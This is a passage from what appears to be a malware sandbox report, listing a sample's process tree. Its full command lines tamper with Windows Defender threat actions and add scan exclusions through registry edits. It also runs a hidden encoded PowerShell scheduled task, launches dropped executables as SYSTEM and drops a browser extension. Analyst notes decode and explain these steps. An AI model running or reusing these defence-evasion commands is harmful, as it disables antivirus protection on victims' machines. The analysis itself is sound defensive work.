  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
-
Process (depth 3): C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

Process (depth 4): C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
Process (depth 2): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"
  Note: under Exclusions\Paths the value name is the excluded folder and the REG_DWORD data 0 is simply how the policy encodes an entry, so each REG ADD above registers a folder that Defender will no longer scan; the ten folders match the drop locations seen later in this tree (the Program Files (x86), ProgramData, Temp and browser-extension directories).
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Process (depth 3): C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

Process (depth 4): C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64
Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "gqNpsevXQ" /SC once /ST 00:39:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  Note: the -EncodedCommand argument is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force (a hidden group-policy refresh, which is what makes the Defender policy values written above take effect).
  - Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "gqNpsevXQ"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "gqNpsevXQ"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:37:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exe\" y7 /flQKdidRH 385118 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "WKALCIrwIEiqhKBsn"

Process (depth 2): C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 688
  - Program crash

Process (depth 1): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  Note: this is the gqNpsevXQ scheduled task firing; the encoded command is the same one decoded above.
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken

Process (depth 2): C:\Windows\system32\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force

Process (depth 1): C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger

Process (depth 1): C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exe
  Command line: C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exe y7 /flQKdidRH 385118 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
Process (depth 2): C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

Process (depth 3): C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

Process (depth 4): C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Process (depth 5): \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Process (depth 3): C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

Process (depth 4): C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Process (depth 5): \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Process (depth 3): C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

Process (depth 4): C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

Process (depth 5): \??\c:\windows\SysWOW64\reg.exe
